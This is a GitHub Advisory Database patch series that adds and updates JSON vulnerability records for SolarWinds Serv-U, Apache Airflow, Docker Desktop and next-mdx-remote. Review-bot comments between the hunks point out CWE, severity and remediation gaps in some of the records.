+++ b/advisories/unreviewed/2026/02/GHSA-vh45-gfxf-vr42/GHSA-vh45-gfxf-vr42.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vh45-gfxf-vr42", + "modified": "2026-02-24T09:31:21Z", + "published": "2026-02-24T09:31:21Z", + "aliases": [ + "CVE-2025-40541" + ], + "details": "An Insecure Direct Object Reference (IDOR) vulnerability exists in Serv-U, which when exploited, gives a malicious actor the ability to execute native code as a privileged account.\n\nThis issue requires administrative privileges to abuse. On Windows deployments, the risk is scored as a medium because services frequently run under less-privileged service accounts by default.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40541" + }, + { + "type": "WEB", + "url": "https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-4_release_notes.htm" + }, + { + "type": "WEB", + "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40541" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-704" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T08:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x366-cwf7-x9gv/GHSA-x366-cwf7-x9gv.json b/advisories/unreviewed/2026/02/GHSA-x366-cwf7-x9gv/GHSA-x366-cwf7-x9gv.json new file mode 100644 index 0000000000000..60e9858d7603b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x366-cwf7-x9gv/GHSA-x366-cwf7-x9gv.json 
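Review bot: `cwe_ids` lists `"CWE-704"` (incorrect type conversion or cast), but `details` describes an Insecure Direct Object Reference, which is an authorization weakness. The same CWE appears on the two type-confusion Serv-U records in this patch (GHSA-8cmg-xf32-xmvr and GHSA-jjx5-vcwr-cwfq), so the value looks carried over rather than assigned. It should be checked against the vendor advisory and, if the IDOR wording is correct, replaced with `"CWE-639"`. Separately, `"severity": "CRITICAL"` follows from the `S:C` vector, while the text says administrative privileges are required and that Windows deployments are scored medium, which is worth weighing when prioritising.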
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x366-cwf7-x9gv", + "modified": "2026-02-24T09:31:21Z", + "published": "2026-02-24T09:31:21Z", + "aliases": [ + "CVE-2025-40538" + ], + "details": "A broken access control vulnerability exists in Serv-U which when exploited, gives a malicious actor the ability to create a system admin user and execute arbitrary code as a privileged account via domain admin or group admin privileges.\n\nThis issue requires administrative privileges to abuse. On Windows deployments, the risk is scored as a medium because services frequently run under less-privileged service accounts by default.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40538" + }, + { + "type": "WEB", + "url": "https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-4_release_notes.htm" + }, + { + "type": "WEB", + "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40538" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T08:16:27Z" + } +} \ No newline at end of file From 5e588eb9d55532e3abeb8f2f43c8a72239ac3792 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 24 Feb 2026 12:32:59 +0000 Subject: [PATCH 76/77] Publish Advisories GHSA-hm8v-8c3v-cxfq GHSA-8r55-rv5w-6pfm GHSA-q4hc-vp2m-fr47 GHSA-r837-hpv7-pc2f GHSA-x7c5-fjpp-2mcc --- .../GHSA-hm8v-8c3v-cxfq.json | 6 ++- .../GHSA-8r55-rv5w-6pfm.json | 35 +++++++++++++++++ .../GHSA-q4hc-vp2m-fr47.json | 6 ++- .../GHSA-r837-hpv7-pc2f.json | 39 +++++++++++++++++++ .../GHSA-x7c5-fjpp-2mcc.json | 36 +++++++++++++++++ 5 files changed, 120 insertions(+), 2 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-8r55-rv5w-6pfm/GHSA-8r55-rv5w-6pfm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r837-hpv7-pc2f/GHSA-r837-hpv7-pc2f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x7c5-fjpp-2mcc/GHSA-x7c5-fjpp-2mcc.json diff --git a/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json b/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json index 52b84781bac69..07d9cc442ebd2 100644 --- a/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json +++ b/advisories/unreviewed/2025/10/GHSA-hm8v-8c3v-cxfq/GHSA-hm8v-8c3v-cxfq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hm8v-8c3v-cxfq", - "modified": "2026-02-23T15:31:14Z", + "modified": "2026-02-24T12:31:40Z", "published": "2025-10-03T12:33:14Z", "aliases": [ "CVE-2025-11234" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:3077" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:3165" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-11234" diff --git a/advisories/unreviewed/2026/02/GHSA-8r55-rv5w-6pfm/GHSA-8r55-rv5w-6pfm.json b/advisories/unreviewed/2026/02/GHSA-8r55-rv5w-6pfm/GHSA-8r55-rv5w-6pfm.json new file mode 100644 index 0000000000000..8207e5a29e5db --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8r55-rv5w-6pfm/GHSA-8r55-rv5w-6pfm.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8r55-rv5w-6pfm", + "modified": "2026-02-24T12:31:40Z", + "published": "2026-02-24T12:31:40Z", + "aliases": [ + "CVE-2025-27555" + ], + "details": "Airflow versions before 2.11.1 have a vulnerability that allows authenticated users with audit log access to see sensitive values in audit logs which they should not see. When sensitive connection parameters were set via airflow CLI, values of those variables appeared in the audit log and were stored unencrypted in the Airflow database. While this risk is limited to users with audit log access, it is recommended to upgrade to Airflow 2.11.1 or a later version, which addresses this issue. Users who previously used the CLI to set connections should manually delete entries with those connection sensitive values from the log table. This is similar but not the same issue as CVE-2024-50378", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27555" + }, + { + "type": "WEB", + "url": "https://github.com/apache/airflow/pull/61882" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/nxovkp319jo8vg498gql1yswtb2frbkw" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-201" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T10:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json b/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json index 63bddd81d06bb..d068af546c15a 100644 --- a/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json +++ b/advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json 
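Review bot: `"severity": []`, `"severity": null` and `"affected": []` leave GHSA-8r55-rv5w-6pfm with no machine-readable score or version range, although `details` itself states the boundary (Airflow before 2.11.1). Tools that match on `affected` or sort by severity will not surface it, and the same empty fields appear on GHSA-r837-hpv7-pc2f later in this patch. When the record is reviewed, an `affected` entry for the `apache-airflow` package with `{"fixed": "2.11.1"}` would encode what the text already says; the package name is inferred from the referenced repository. The `details` text also asks operators to delete previously logged connection secrets from the log table, a clean-up step that an upgrade alone does not cover.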
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q4hc-vp2m-fr47", - "modified": "2026-02-23T18:32:02Z", + "modified": "2026-02-24T12:31:40Z", "published": "2026-02-23T18:32:02Z", "aliases": [ "CVE-2025-14905" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14905" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:3189" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-14905" diff --git a/advisories/unreviewed/2026/02/GHSA-r837-hpv7-pc2f/GHSA-r837-hpv7-pc2f.json b/advisories/unreviewed/2026/02/GHSA-r837-hpv7-pc2f/GHSA-r837-hpv7-pc2f.json new file mode 100644 index 0000000000000..cbec64bcdc3de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r837-hpv7-pc2f/GHSA-r837-hpv7-pc2f.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r837-hpv7-pc2f", + "modified": "2026-02-24T12:31:40Z", + "published": "2026-02-24T12:31:40Z", + "aliases": [ + "CVE-2024-56373" + ], + "details": "DAG Author (who already has quite a lot of permissions) could manipulate database of Airflow 2 in the way to execute arbitrary code in the web-server context, which they should normally not be able to do, leading to potentially remote code execution in the context of web-server (server-side) as a result of a user viewing historical task information.\n\nThe functionality responsible for that (log template history) has been disabled by default in 2.11.1 and users should upgrade to Airflow 3 if they want to continue to use log template history. They can also manually modify historical log file names if they want to see historical logs that were generated before the last log template change.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56373" + }, + { + "type": "WEB", + "url": "https://github.com/apache/airflow/pull/61880" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/2vrmrhcht6g7cp5yjxpnrk2wtrncm6cy" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/23/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T10:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x7c5-fjpp-2mcc/GHSA-x7c5-fjpp-2mcc.json b/advisories/unreviewed/2026/02/GHSA-x7c5-fjpp-2mcc/GHSA-x7c5-fjpp-2mcc.json new file mode 100644 index 0000000000000..b5dc6645071a3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x7c5-fjpp-2mcc/GHSA-x7c5-fjpp-2mcc.json 
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x7c5-fjpp-2mcc",
+ "modified": "2026-02-24T12:31:40Z",
+ "published": "2026-02-24T12:31:40Z",
+ "aliases": [
+ "CVE-2026-2664"
+ ],
+ "details": "An out of bounds read vulnerability in the grpcfuse kernel module present in the Linux VM in Docker Desktop for Windows, Linux and macOS up to version 4.61.0 could allow a local attacker to cause an unspecified impact by writing to /proc/docker entries. The issue has been fixed in Docker Desktop 4.62.0 .",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2664"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.docker.com/desktop/release-notes/#4620"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-125"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T10:16:03Z"
+ }
+}
\ No newline at end of file
From 8be3abb80dc1273c6a33ffe27f20bf86c8867e3d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 24 Feb 2026 14:22:32 +0000 Subject: [PATCH 77/77] Publish Advisories GHSA-g4xw-jxrg-5f6m GHSA-g4xw-jxrg-5f6m --- .../GHSA-g4xw-jxrg-5f6m.json | 69 +++++++++++++++++++ .../GHSA-g4xw-jxrg-5f6m.json | 36 ---------- 2 files changed, 69 insertions(+), 36 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json
diff --git a/advisories/github-reviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json b/advisories/github-reviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json
new file mode 100644
index 0000000000000..63961d5d55767
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g4xw-jxrg-5f6m",
+ "modified": "2026-02-24T14:20:56Z",
+ "published": "2026-02-12T03:31:01Z",
+ "aliases": [
+ "CVE-2026-0969"
+ ],
+ "summary": "next-mdx-remote affected by arbitrary code execution in React server-side rendering of untrusted MDX content",
+ "details": "The serialize function used to compile MDX in next-mdx-remote is vulnerable to arbitrary code execution due to insufficient sanitization of MDX content.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "next-mdx-remote"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.3.0"
+ },
+ {
+ "fixed": "6.0.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0969"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/hashicorp/next-mdx-remote/commit/4d527fdcaed911b87f427d0b4d3c711e817fa4b3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://discuss.hashicorp.com/t/hcsec-2026-01-arbitrary-code-execution-in-react-server-side-rendering-of-untrusted-mdx-content/77155"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/hashicorp/next-mdx-remote"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/hashicorp/next-mdx-remote/releases/tag/v6.0.0"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-94"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-24T14:20:55Z",
+ "nvd_published_at": "2026-02-12T03:15:46Z"
+ }
+}
\ No newline at end of file
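Review bot: The `details` string gives no remediation, although the new `affected` range marks `6.0.0` as fixed and the references link the v6.0.0 release. A reader who sees only the prose gets no upgrade target. Appending a sentence such as `Upgrade to next-mdx-remote 6.0.0 or later.` to `details` would carry that into the text. Nothing in the record explains the `"introduced": "4.3.0"` bound, so it is worth confirming against the linked HCSEC-2026-01 bulletin that earlier releases really are unaffected.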
diff --git a/advisories/unreviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json b/advisories/unreviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json
deleted file mode 100644
index 157325be9b0a5..0000000000000
--- a/advisories/unreviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json
+++ /dev/null
@@ -1,36 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-g4xw-jxrg-5f6m",
- "modified": "2026-02-12T03:31:01Z",
- "published": "2026-02-12T03:31:01Z",
- "aliases": [
- "CVE-2026-0969"
- ],
- "details": "The serialize function used to compile MDX in next-mdx-remote is vulnerable to arbitrary code execution due to insufficient sanitization of MDX content.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0969"
- },
- {
- "type": "WEB",
- "url": "https://discuss.hashicorp.com/t/hcsec-2026-01-arbitrary-code-execution-in-react-server-side-rendering-of-untrusted-mdx-content/77155"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-94"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2026-02-12T03:15:46Z"
- }
-}
\ No newline at end of file